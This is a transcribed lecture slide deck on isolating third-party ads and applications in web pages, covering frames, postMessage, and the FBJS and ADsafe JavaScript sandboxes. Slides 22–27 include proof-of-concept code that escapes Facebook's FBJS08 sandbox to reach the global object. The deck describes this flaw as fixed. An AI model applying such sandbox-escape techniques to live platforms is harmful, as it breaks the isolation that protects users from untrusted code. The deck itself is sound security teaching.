Mashups and Language-Based Isolation - PowerPoint PPT Presentation

1
Mashups and Language-Based Isolation
CS 142
Winter 2009
  • John Mitchell

2
Mashups
3
Advertisements
5
Social Networking Sites
6
Third-party content: Ads
(Diagram: customer accounts, advertising network)
7
Third-party content: Apps
(Diagram: user data, user-supplied application)
8
Why Use Frames
  • Isolation
  • Different frames can represent different
    principals
  • Same-origin policy: a frame can only read or
    modify frames from the same scheme/host/port
  • Delegation
  • A frame can draw only on its own rectangle
  • Modularity
  • Reuse the same content in multiple places
  • Failure containment
  • Parent may work even if a frame is slow to load
    or broken

(Screenshot: a page composed of frames, e.g. src=google.com/... name=awglogin and src=7.gmodules.com/... name=remote_iframe_7)
9
Why Not To Use Frames
  • Inconvenient
  • Container does not fit content
  • Quirky browser behavior (history, sound)
  • Performance impact
  • Security concerns
  • Frame hijacking
  • Browser exploits
  • Inability to communicate
  • Cannot send messages to cross-domain frames
  • Alternatives
  • Flash
  • Rewriting: FBJS, ADsafe, Caja

10
postMessage
  // 2008 draft API as shown on the slide; the HTML5 API that shipped
  // uses e.origin and a targetOrigin argument instead of e.domain / e.uri
  frames[0].postMessage("Hello world.");
  document.addEventListener("message", receiver);
  function receiver(e) {
    if (e.domain == "example.com") {
      if (e.data == "Hello world") {
        e.source.postMessage("Hello", e.domain, e.uri);
      }
    }
  }

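As an added example (not code from the lecture), here is the same receiver written against the postMessage API that actually shipped, with MessageEvent.origin and a targetOrigin argument in place of the draft e.domain / e.uri names; the trusted sender https://example.com and the message format are assumptions made for this example.

```javascript
// Added example, not from the lecture: a receiver written against the postMessage
// API that actually shipped (MessageEvent.origin and a targetOrigin argument), in
// place of the draft e.domain / e.uri names used on the slide. The assumed trusted
// sender is https://example.com; the message format is constructed for this example.
const TRUSTED_ORIGIN = "https://example.com";

// Decides what to do with one incoming message. Returns the reply and the origin
// it may be delivered to, or null when the message must be ignored.
function handleMessage(e) {
  // Exact comparison of the full origin (scheme://host[:port]). A substring or
  // prefix test would accept "https://example.com.attacker.test" or
  // "http://example.com", which the same-origin policy treats as different principals.
  if (e.origin !== TRUSTED_ORIGIN) return null;
  // Treat e.data as untrusted input even from the trusted origin: check its shape
  // before acting on it, and never feed it to eval or innerHTML.
  if (typeof e.data !== "object" || e.data === null) return null;
  if (e.data.type !== "hello" || typeof e.data.nonce !== "string") return null;
  // Reply to the verified origin only, never "*": if the sending frame has since
  // been navigated to another site, the browser drops the reply instead of
  // delivering it there.
  return { reply: { type: "hello-ack", nonce: e.data.nonce }, targetOrigin: e.origin };
}

// Browser wiring (assumed page code; not executed outside a browser).
if (typeof window !== "undefined") {
  window.addEventListener("message", (e) => {
    const r = handleMessage(e);
    if (r !== null) e.source.postMessage(r.reply, r.targetOrigin);
  });
}

// Constructed events for a stand-alone run (a real MessageEvent has the same fields).
const GOOD  = { origin: "https://example.com", data: { type: "hello", nonce: "n1" } };
const FAKE  = { origin: "https://example.com.attacker.test", data: { type: "hello", nonce: "n1" } };
const PLAIN = { origin: "http://example.com", data: { type: "hello", nonce: "n1" } };
const JUNK  = { origin: "https://example.com", data: "Hello world" };
```
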
11
Referer Suppression Experiment
Remember this from Lecture 12 by Collin?
  • Measure how often Referer is suppressed
  • Placed a JavaScript advertisement for $200
  • 283,945 impressions

12
How does this work?
(Diagram: Advertiser, Ad Network, Publisher, Browser, with Content and Ad boxes between them)
13
Zero-click attacks
  • Clients vulnerable
  • Malware can attack browser implementation errors
  • Browser-resident malware can use intended
    functionality to carry out malicious attacks
  • Easy to place
  • $30 in advertisements reach 50,000 browsers
  • Brian Krebs on Computer Security
  • Hackers Exploit Adobe Reader Flaw
  • Security Fix has learned that a security hole in
    Adobe Reader is actively being exploited to
    break into Microsoft Windows computers.
  • According to information released Friday by
    iDefense, Web site administrators spotted
    hackers taking advantage of the flaw on Jan. 20,
    2008, when tainted banner ads were identified
    that served specially crafted Acrobat PDF files
    designed to exploit the hole and install
    malicious software.

Ad serves PDF file that installs Zonebac,
modifies search engine results
14
Problems with advertisements
  • Ad network and publisher have incentives to show ads
  • Could place ads in an iframe
  • Rules out more profitable floating ads, etc.
  • Ad network and publisher can try to screen ads
  • Yahoo! ADsafe
  • Google Caja
  • Some limitations in the current web
  • Ads may contain links to images that are part
    of the ad
  • Important to remember
  • This is a very effective way to reach victims:
    30-50 per 1000
  • User does not have to click on anything to run
    malicious code

15
Sandbox
  • A safe place for kids to play without hurting
    each other or anyone else

16
Possible approach
  • Goal
  • Write a static analyzer to check untrusted
    JavaScript and determine if it is malicious
  • Solvable?
  • Very difficult because of functions that can
    convert string to code and vice versa, e.g. eval
  • More likely to have a solution
  • Find a well-defined and meaningful subset of
    JavaScript for which this is solvable
  • Prohibit problematic functions like eval

17
Some JavaScript examples
  • Use of this inside functions
  • Implicit conversions

  var b = 10;
  var f = function() {
    var b = 5;
    function g() { var b = 8; return this.b; }
    return g();
  };
  var result = f();   // has as value 10: this inside g is the global object

  var y = "a";
  var x = { toString: function() { return y; } };
  x = x + 10;         // "a10": implicit call to toString
18
Sometimes tricky
  • Which declaration of g is used?
  • String computation of property names
  • for (p in o) ..., eval(...), o[s] allow strings
    to be used as code and vice versa

  var f = function() {
    var a = g();
    function g() { return 1; }
    function g() { return 2; }
    var g = function() { return 3; };
    return a;
  };
  var result = f();   // has as value 2: the last function declaration is hoisted and wins

  var m = "toS"; var n = "tring";
  Object.prototype[m + n] = function() { return undefined; };
19
Facebook FBJS
  • Subset of JavaScript for Facebook applications
  • Application code is fetched from the publisher's
    (untrusted) server and embedded as a subtree of
    the page
  • Not placed in an iframe
  • Application code is statically checked to see if
    it is valid FBJS
  • FBJS code is rewritten and certain run-time
    checks are added

20
FBJS restrictions
  • Security goal
  • Restrict access to the Document Object Model (DOM)
    and the global object
  • Prevent clashes with other applications
  • Method 1: Filtering
  • Forbid eval, with
  • Disallow explicit access to properties (via the
    dot notation o.p) valueOf, __parent__,
    constructor
  • Method 2: Rewriting
  • Add an application-specific prefix to all top-level
    identifiers
  • Example: o.p is renamed to a1234_o.p
  • Separates the effective namespace of an application
    from others

21
More about FBJS08
  • Some details of rewriting
  • this is rewritten to ref(this)
  • ref is a function defined by the host (Facebook) in
    the global object
  • ref(x) = x if x != window, else ref(x) = null
  • Prevents application code from accessing the
    global object
  • o[p] gets rewritten to o[idx(p)]
  • Returns an error if p is a black-listed property,
    such as "__x__"
  • Facebook also provides libraries
  • Accessible within the application namespace, they
    allow applications to safely access certain parts
    of the global object

22
Problem with FBJS08
  • Attack
  • Get a handle to the global object in the
    application code
  • Almost works
  • var getthis = function() { return this; };
  • Except that
  • this gets rewritten to ref(this) and the code
    returns null
  • But we can redefine ref itself
  • ref is defined in the global object and
    application code is disallowed from having a handle
    to the global object
  • But we can define a local ref in a local scope and
    defeat FBJS08
  • try { throw (function() { return this; }); }
    catch (f) { curr_scp = f(); }

24
Exploit code (now fixed!)
  <a href="" onclick="b()">Test B (Safari, Opera and Chrome)</a>
  <script>
  function b() {
    try { throw (function() { return this; }); }
    catch (get_scope) {
      get_scope().ref = function(x) { return x; };
      this.alert("Hacked!");
    }
  }
  </script>
  <a href="" onclick="a()">Test A (Firefox and Safari)</a>
  <script>
  var get_win = function get_scope(x) {
    if (x == 0) return this;
    else {
      get_scope(0).ref = function(x) { return x; };
      return get_win(0);
    }
  };
  function a() { get_win(1).alert("Hacked!"); }
  </script>
25
Attack 1
  try { throw (function() { return this; }); }
  catch (get_scope) { get_scope().ref = function(x) { return x; }; }
  • ECMA-262 semantics for try ... catch (f) ...
    say that whenever an exception is thrown:
  • A new object o is created with property f pointing
    to the exception object
  • o is placed on top of the scope chain (o does
    not have activation-object status)
  • The "this" of a function not defined in an
    activation object is the object containing it. In
    the code above, this for get_scope resolves to o.
  • Shadow the original ref by redefining it in o

26
Attack 2
  var get_window = function f(x) { if (x == 0) return this; else return f(x - 1); };
  • ECMA-262 says that whenever a named recursive
    function f is created, the internal scope chain
    (f_scp) of the function (the environment pointer of
    the closure) is set to the current lexical scope
    with a dummy object (o_f) placed on top

27
Attack 2 (continued)
  • When the function f is called, the current scope
    chain is replaced with f_scp and an activation
    object for f is placed on top of it
  • Every recursive call to f will resolve to
    property f of the dummy object o_f (which is not
    an activation object)
  • Accessing this inside f will resolve to o_f
  • Shadow the original ref by redefining it in o_f

28
What is possible?
  • Filtering principle
  • Subset of JavaScript: if a program accesses
    property p, either p appears textually in the
    program or it is from a list of implicit properties
  • Isolation principle 1
  • Subset of JavaScript: semantics-preserving,
    capture-avoiding renaming of identifiers (except
    names of predefined properties)
  • Isolation principle 2
  • Subset of JavaScript: no program can access any
    scope object
  • Isolation principle 3
  • Given lists of forbidden properties P_noW and
    P_noRW, cannot write properties in P_noW and
    cannot read or write properties in P_noRW
  • Rewriting principles
  • Achieve some forms of isolation by restricting
    semantics

29
Isolation of property names (Jt)
  • Goal
  • All property names that get accessed must appear
    textually in the code
  • If the program does not contain
  • eval, Function, o[...] etc. which convert strings to
    code
  • Then any property accessed is either in the code or
  • an implicit property access: toString, toNumber,
    valueOf, length, prototype, constructor, message,
    arguments, Object, Array
  • Application
  • If we want to prevent access to certain
    properties, restrict to this sublanguage Jt and
    inspect the code

30
Isolating scope objects (Js)
  • How can code in subset Jt access scope objects?
  • Identifier this
  • Object.prototype.valueOf, Array.prototype.sort
    /concat/reverse can implicitly access this
  • Define subset Js of Jt
  • Prohibit this, valueOf, sort, concat and reverse
  • Properties of Js
  • Programs cannot access scope objects
  • Can rename variables: variable names can never be
    accessed (explicitly) as properties
  • But not variables with the same name as native
    properties

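As an added example (not Facebook's FBJS checker, ADsafe, or any tool from the lecture), a toy static filter for the Jt and Js sublanguages of the last three slides: it rejects the string-to-code and scope-object constructs, and reports the textually present property names so they can be compared with a blacklist P_noRW. The sample programs are constructed; the tokenizer skips strings and comments but does not handle regex literals.

```javascript
// Added example, not Facebook's FBJS checker or the lecture's own code: a toy
// static filter for the Jt / Js sublanguages. It tokenizes a program (string
// literals and comments are skipped, so text inside them is not code), rejects
// constructs that turn strings into code or expose scope objects, and collects
// the property names that appear textually so they can be compared against a
// blacklist P_noRW. Regex literals are not handled: this is a teaching model.
const TOKEN = /\s+|\/\/[^\n]*|\/\*[\s\S]*?\*\/|"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|[A-Za-z_$][\w$]*|\d+|./g;

// Jt: no string-to-code conversion. Js: additionally no scope-object access.
const FORBIDDEN_JT = new Set(["eval", "Function", "with"]);
const FORBIDDEN_JS = new Set(["this", "valueOf", "sort", "concat", "reverse"]);
// Property accesses that can happen without appearing in the text (slide 29).
const IMPLICIT = ["toString", "valueOf", "length", "prototype", "constructor",
                  "message", "arguments", "Object", "Array"];

function checkProgram(src, blacklist = []) {
  const toks = (src.match(TOKEN) || [])
    .filter(t => !/^\s/.test(t) && !/^\/[\/*]/.test(t));   // drop whitespace, comments
  const errors = [];
  const props = new Set();
  toks.forEach((t, i) => {
    const prev = toks[i - 1];
    if (FORBIDDEN_JT.has(t)) errors.push(`Jt: forbidden identifier '${t}'`);
    if (FORBIDDEN_JS.has(t)) errors.push(`Js: forbidden identifier '${t}'`);
    // o[expr]: the property name is computed at run time, so it need not appear in the text.
    if (t === "[" && prev !== undefined && /^[\w$)\]]/.test(prev)) {
      errors.push("Jt: computed property access o[...]");
    }
    if (prev === "." && /^[A-Za-z_$]/.test(t)) props.add(t);   // o.p: p appears textually
  });
  // Everything the program can reach: textual names plus the implicit ones.
  const reachable = new Set([...props, ...IMPLICIT]);
  for (const p of blacklist) {
    if (reachable.has(p)) errors.push(`blacklisted property '${p}' is reachable`);
  }
  return { ok: errors.length === 0, errors, properties: [...props] };
}

// Constructed sample programs.
const SAMPLES = {
  clean:    'var a = o.p + 1; // eval only in a comment\nvar s = "eval(1)";',
  evalCall: 'var x = eval("1 + 1");',
  thisLeak: 'var getthis = function() { return this; };',
  computed: 'var m = "toS", n = "tring"; o[m + n] = 1;',
  proto:    'o.__proto__.x = 1;',
};
```
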
31
Example
  • Security goal
  • Restrict access to the Document Object Model (DOM)
    and the global object
  • Method 1: Filtering
  • Forbid eval, with, ...
  • Method 2: Require special program idioms
  • Access property p of object o by calling
    ADSAFE.get(o, p)

32
Subtlety
  • ADsafe restriction
  • "All interaction with the trusted code must
    happen only using the methods in the ADSAFE
    object."
  • This may not be possible!

  // Somewhere in trusted code
  Object.prototype.toString = function() { ... };
  ...
  // Untrusted code
  var o = {};
  o = o + "";   // converts o to a String: implicitly calls the trusted toString

Bottom line: need to restrict definitions that
occur in trusted code
33
Possible approach
  • Analyze the library of the host page
  • Compute a blacklist P_noRW of security-critical
    properties that could lead to a security breach
    (How?)
  • Use subset Js; filter for P_noRW

34
Conclusion
  • Modern sites incorporate third-party content
  • Advertisements
  • Applications
  • Third-party content must be isolated
  • Or expose everyone to easy malicious attacks
  • Two basic approaches
  • Use browser mechanism, such as iframes
  • Filter, rewrite, and restrict execution of
    untrusted content
  • Language-based sandboxing is tricky
  • Subtle problems with recent methods
  • Progress on reliable foundations is possible

37
Web Advertising
  • Deliver advertisements to viewers via the Web
  • More effective and more profitable if the user
    profile is known

Source: U Texas iSchool student study,
www.ischool.utexas.edu/i385e/studentsPPT/fogle_IAWebAdv.ppt
38
Web ad placement and type
  • Ad positions
  • Dark orange (strong), light yellow (weak)
  • Ads near rich content and navigation, and at the
    top-left do better
  • Ad types
  • Banner
  • Sidebar
  • Pop-ups, pop-unders
  • Floating
  • Unicast

39
Banner
  • HTML code loads a specific website
  • Varies in content and shape
  • Horizontal
  • 50 cents / 1000

40
Sidebar
  • Skyscraper
  • Vertical
  • 2-3 times larger than a banner
  • Harder to scroll it off the page
  • $1.00 - $1.50 / 1000

41
Pop-ups
  • Opens in its own window
  • Obscures the page you're viewing
  • Forced to close or move it

42
Pop-unders
  • Opens under the content you're viewing
  • Less intrusive than a pop-up
  • Both are more effective than a banner
  • Banners: 2-5 clicks / 1000
  • Pop-ups: 30 clicks / 1000
  • Can cost 4-10 times more than a banner

43
Floating
  • Float or fly over the page for 5-30 s
  • Obscure view, block mouse input
  • Gets attention: animation, sound
  • Powerful branding tool - hard to ignore
  • 30 clicks / 1000
  • $3 - $30 / 1000

44
Unicast
  • TV commercials that run in a pop-up
  • 10-30 s
  • Same branding power as a TV commercial, plus
    being able to go to the website
  • 50 clicks / 1000
  • $30 / 1000

From AOL.com
45
Web Publishing and Advertising
(Diagram: Advertiser, Ad Network, Publisher, Browser, with Content and Ad boxes between them)